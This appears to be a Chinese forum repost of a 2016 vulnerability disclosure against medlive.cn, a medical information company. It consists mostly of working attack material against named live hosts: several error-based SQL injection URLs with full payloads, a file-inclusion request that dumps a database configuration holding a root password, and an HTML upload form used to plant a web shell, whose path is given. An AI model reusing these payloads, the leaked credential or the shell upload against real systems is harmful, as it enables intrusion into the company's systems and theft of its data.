HanDs
管理员

[7月漏洞公开] 医疗企业安全之医脉通多站多处SQL注入打包&某内部系统Getshell 



送厂商一堆注入点

详细说明:

1.http://fss.medlive.cn/?ac=check&type=email&email=*

1.png



2.http://dic.medlive.cn/common/ajax.inc.php

post:

domain_id=24&ip_id=292458

2.png



3.http://refer.medlive.cn/common/ajax.inc.php

post:

domain_id=24&ip_id=292458

3.png



4.http://mbsjt.medlive.cn/sci/searchCourse/more-course

post:

title=*&page=2

4.png



5.有一堆

http://oa.medlive.cn/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23

http://oa.medlive.cn/interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7e7e7e,version(),0x7e7e7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271

http://oa.medlive.cn/inc/finger/use_finger.php?USER_ID=-123%df%27and%20extractvalue(1,%20concat(0x5c,(select%20user()%20from%20`user`%20limit%201)))%23

http://oa.medlive.cn/interface/ugo.php?OA_USER=aaaaaa%2527

http://oa.medlive.cn/module/sel_seal/get.php?ID=1%df%27

http://oa.medlive.cn/ispirit/check_secure_key.php?USERNAME=%df%27 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- xxx

5.png



6.文件包含

http://oa.medlive.cn/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php

code 区域
array( 'default_host' => $MYOA_MEMCACHED_HOST, 'default_port' => $MYOA_MEMCACHED_IP, 'default_persistent' => true, 'default_weight' => 1 ) ); //-- MYOA数据库配置 -- $MYSQL_SERVER="localhost:3336"; $MYSQL_USER="root"; $MYSQL_DB="TD_OA"; $MYSQL_PASS="myoa888"; ?>

漏洞证明:

7.getshell

code 区域
<form enctype="multipart/form-data" action="http://oa.medlive.cn/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>



shell地址:

http://oa.medlive.cn/general/vmeet/wbUpload/cssroot.php

mask 区域
*****��*****



7.png

修复方案:

没干坏事


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
医疗 企业 安全 通多站 S QL
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组
快速回复